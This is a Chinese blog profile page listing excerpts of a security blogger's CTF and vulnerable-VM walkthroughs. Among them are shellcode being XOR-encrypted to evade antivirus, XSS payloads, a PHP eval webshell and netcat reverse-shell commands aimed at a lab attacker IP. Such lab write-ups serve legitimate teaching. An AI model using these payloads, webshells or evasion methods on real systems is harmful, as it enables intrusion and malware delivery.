自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(26)
  • 资源 (2)
  • 收藏
  • 关注

原创 【免杀】异或加密Shellcode免杀绕过火绒、360

msfvenom生成c格式的shellcode对该shellcode进行异或加密#include<string>#include <iostream>using namespace std;using std::string;unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x0f\xb7.

2022-03-19 17:39:13 2353 2

原创 frp内网渗透隧道技术

​1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)服务器修改配置文件 frps.ini:[common]bind_port = 7000启动服务端:./frps -c ./frps.ini2.控制端-下载-解压-修改-启动控制端修改配置文件 frpc.ini:[common]server_addr = 你的云主机 ipserver_port = 7000 #frpc 工作端口,必须和上面 frps 保持一致[msf]type = tcplocal.

2022-02-26 12:26:58 968

原创 Raven2--靶机渗透--MysqlUDF提权--linux提权

信息搜集nmap扫描端口和ip发现80端口,用dirsearch扫描目录扫描到了vendor和wordpress目录以及contact.php页面随便看看,找到一个flag,并发现搭建了PHPMail之前爆出过phpmail的漏洞,我们用kali的searchexploit搜索一下再根据vender/version文件得知版本号为开头添加这个 防止乱码#!/usr/bin/python# -*- coding: utf-8 -*-...

2022-02-17 12:29:44 3113

原创 Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权

针对环境windows有两种环境,一种是web网站拿到的webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。提权方法1.win溢出漏洞(如何判断类型和利用)信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取?利用wes进行补丁筛选2.数据库提权...

2022-02-13 15:07:31 4392

原创 逻辑越权---小迪33天

靶场:pikachu水平越权:进入一个普通用户,查看信息(抓包),修改包为另一个用户的username(信息搜集得来)放包,达成水平越权垂直越权:操作1 获取admin操作的数据包 转到bp的重放2 来到普通用户界面 抓包 拿取cookie信息 3 将重放的数据包的cookie改为普通用户的cookie信息原理:对普通用户来说,高权限功能依然存在,但是不显示在前端,可以通过抓包来使用高权限功能代码分析admin_edit.php只判断登录状态,即普通用户登录之后无..

2022-01-20 19:35:50 2149

原创 文件上传绕过安全狗V3.5---绕过WAF---uploadlabs

目录环境:测试:1.数据溢出-防匹配 参数;saldmsakdsaxxsadsa(垃圾数据);参数2.符号变异-防匹配1 "Getzwt.php:"文件名后加:2 filename========"Getzwt.php"​3.破坏数据包的完整性1 去除formdata2 去除content-type参数4 重复数据-防匹配1 filename=;filename="Getzwt.php" 参数之间以;分隔,让waf认为filename=null从而绕...

2022-01-16 11:50:28 2353

原创 XSS常用Payload

1.普通的<ScRipt>alert(1)</ScRipt>1"><ScRipt>alert(1)</ScRipt>2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过' onclick ='javascript:alert(1)'//" onclick ='javascript:alert(1)'//3.<> script onclick被过滤,用a标签绕过"></input><

2022-01-11 23:15:47 9870

原创 Springboot学习笔记

Profile内部配置加载顺序Spingboot外部配置文件加载顺序Springboot整合JunitSpringboot整合Redisredis-server /etc/redis.conf 不加配置文件则连接不上但是用服务器的redis-cli无法读取存入的值编写DataSource相关配置一、纯注解开发不需要写Mybatis配置...

2022-01-05 08:07:44 98

原创 Apache Log4j2 远程代码执行漏洞复现

环境搭建将jar包导入用dnslog测试说明环境存在着该漏洞然后我用kali作为攻击机使用marshalsec的项目来搭建ldap服务器或者zmi服务器git clone https://github.com/mbechler/marshalsec.gitcd marshalsec-mastermvn clean package -DskipTests如果没有mvnapt-get install mvn..

2021-12-29 10:31:51 2617

原创 2021届ByteCtf---double sqli-----writeup----WebCTF------clickhouse

通过id =1 and 1=2 和id=1 and 1=1 结果不同断定存在sql注入漏洞想用sqlmap注入发现无法指纹识别DBMS然后用联合查询?id=0 union select database()报错(union_default_mode) is empty: 原来是没设置DISTINCT/ALL发现DBMS是clickhouse的查阅资料ClickHouse官方文档system.tables | ClickHouse Do...

2021-10-20 00:57:30 668

原创 攻防世界--Web进阶--Shrine--flask模板注入--全局变量Current-app--沙盒逃逸

查看项目源码代码审计import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')def index(): return open(__file__).read()@app.route('/shrine/<path:shrine>')def shrine(shrine): def saf...

2021-10-11 19:33:21 1963

原创 攻防世界--Web进阶--easytornado---模板注入

目录信息搜集模板注入生成filehash信息搜集发现flag的位置,于是我们试试能不能访问报错了查看/welcome.txt由于render({options})可以猜测有模板注入漏洞。/hints.txt提醒md5(cookie_secret+md5(filename))这个应该是file的hash算法了filename应该是/fllllllllllllag cookie_secret不清楚模板注入...

2021-10-11 14:32:02 274

原创 功防世界--Web进阶--supersqli---堆叠注入

目录信息搜集payload信息搜集先添加一个单引号,报错,错误信息如下:error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1接着测试--+注释,发现被过滤,然后使用#注释,可行 用order b..

2021-10-10 23:53:45 989

原创 攻防世界--Web进阶--Web_php_unserialize--反序列化---正则表达式---wakeup绕过----base64加密

来自攻防世界的一道web进阶题,名为Web_php_unserialize题目给出了一段php代码,应该是后台的部分源码:<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//将file变量的文件名赋值给当前类的file。当解构出该类实例化的对象后,该对象的file就是此时赋值的fi..

2021-10-10 16:57:32 1340

原创 攻防世界--Web进阶--Web_python_template_injection---python模板注入---writeup

- 首先看到题目,就知道这道题是关于 **模板注入** 的,什么是模板注入呢? - 为了写 html 代码的时候方便,很多网站都会使用模板,先写好一个 html 模板文件,比如: ```python def test(): code = request.args.get('id') html = ''' <h3>%s</h3>'''%(code) return render_template_string(html) ``` 这段代码中的 `h..

2021-10-10 01:14:02 1036

原创 ctfhub第五空间智能安全大赛真题------PNG图片转换器--file.open漏洞--|管道符

linux中``反引号的作用凡是打上反引号的命令,首先将反引号内的命令执行一次,然后再将已经执行过的命令得到的结果再执行一次,就可以得到我们反引号的输出,比如我们输入命令:`echo cat hello.txt`linux中|管道符的作用| 管道符的作用是 把 管道符左边的的输出 当做右边命令后面待处理的结果例如:ls -lha ~ | more|grep a >haha.txt第五空间智能安全大赛真题----------PNG图片转换器解题步骤:..

2021-10-09 12:23:11 4084 4

原创 攻防世界--Web进阶--unserialize3

xctf类不完整,少了一个大括号。并且给了?code 提示我们用url进行对code进行赋值我们可以利用code进行执行url输入。题目是Unserialize提醒我们是反序列化。所以我们尝试输入序列化后的代码付给code看看会发生,什么。用下面的网址进行运行phpdemo_func_string_serialize 在线代码实例_w3cschool<?phpclass xctf{public $flag = '111';public function __w...

2021-10-08 21:58:40 155

原创 CTFHub Bypass disable_function 利用LD_PRELOAD绕过

LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。putenv()用来改变或增加环境变量的内容. 参数.

2021-10-04 00:12:04 917

原创 ThinkPhp5.0漏洞简单分析

适用版本5.x < 5.1.31, <= 5.0.23未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。实例化控制器,然后调用实例中的方法。跟进controller方法:其中通过parseModuleAndClass方法解析出$module和$class,然后实例化$class。而parseModuleAndClass方法中,当$name以反斜线\开始时直接将其作为类名。利用命名空间的特点,如果可以控制此处的$name(即路由中的contro.

2021-09-30 12:01:20 1211

原创 DC-5靶机渗透简命令汇总

在url中植入一句话木马,可执行外部命令,并显示原始输出<?php passthru($_GET['abc']); ?>[GET /thankyou.php?<?php eval($_REQUEST[123]); ?> HTTP/1.1]【GET /thankyou.php?file=/var/log/nginx/error.log HTTP/1.1】[nc -e /bin/bash 192.168.160.129 1234]nc -lvvp 123gcc -fP

2021-09-30 00:19:34 142

原创 Dc-4靶机渗透----burpsuite抓包与爆破、hydra、sudo、teehee提权、/etc/passwd的使用

nmap扫描,扫描出80端口和ssh端口先访问http服务。再用whatweb和dirb扫描该网站,发现既没有cms有没有相关的文件可以查看那我们只能抓包爆破,或者海德拉爆破,账号其实有提示了大概就是admin,只需破解password即可爆破得到admin:happy登录继续执行命令抓包修改radio的值使用ncnc 192.168.160.129 777 -e /bin/bash改成nc+192.168.160.129+777+-e+/b...

2021-09-27 23:58:47 610

原创 DC-3 渗透实战---sql注入、反弹shell、Ubuntu16.04double-fdput()提权

扫描靶机Ip根据靶机Mac确定靶机ip地址为nmap -sP 192.168.160.0/24或netdiscover -r 192.168.160.0/24确定ip地址为192.168.160.141nmap 192.168.160.141 -sV -p- -A发现80端口,和开源内容管理系统 joomla连接http://192.168.160.141joomscan --url http://192.168.160.141发现joomla...

2021-09-26 11:20:46 769

原创 Windows设置为停止更新

第一步.win+r 输入 services.msc将这两项服务全部禁用 windows update medic service是windows update的保镖,只禁用一个是不行的,这个保镖还是会启动系统更新。并且在这两项的恢复中 失败后的操作选择为 无操作第二步:win+r 输入 gpedit.msc在管理模板/Windows组件/系统更新下的 配置自动更新 双击选择禁用这样就完成了 系统再也不会提升更新了!...

2021-09-25 14:59:58 1169

原创 DC-2 靶机实战------rbash绕过、git提权、WPScan的使用

安装DC-2网卡开启NAT模式开始攻击攻击机kali (192.168.160.0/24)使用wpscan、cewl、hydra、dirb、nmap等工具信息搜集nmap -sP 192.168.160.0/24确定DC-2 IP 192.168.160.140扫描具体开放的端口nmap -sV 192.168.160.140 -p- -A 得知SSH开放和http开放,访问http://192.168.160.140发现ip重定向有问题需.

2021-09-25 00:28:58 346

原创 PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练

准备工作靶机下载​​​​​​https://www.vulnhub.com/entry/potato-suncsr-1,556/可用迅雷下载,也可以点第二个直接下载下载后添加至虚拟机,设置网卡为NAT模式攻击机:kali虚拟机 网卡为NAT模式 ip地址为192.168.160.129开始攻击扫描当前网段下存活主机nmap -sV 192.168.160.0/24或者arp-scan -l 可确定靶机IP为192.168.160.13...

2021-09-21 13:53:02 870

原创 BOB靶机渗透实战-----攻略(大神勿喷)

准备工作靶场Bob: 1.0.1 ~ VulnHub攻击工具kali虚拟机直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。没有给用户名和密码。(给了就没有攻击的必要了 hhh)开始攻击打开kali使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址)我的kali ip 地址为192.168.160.129nmap -sP 192.168.160.0/24...

2021-09-21 01:55:37 2098 4

BOB1.0.1靶机渗透攻略.pdf

网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略

2021-09-21

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除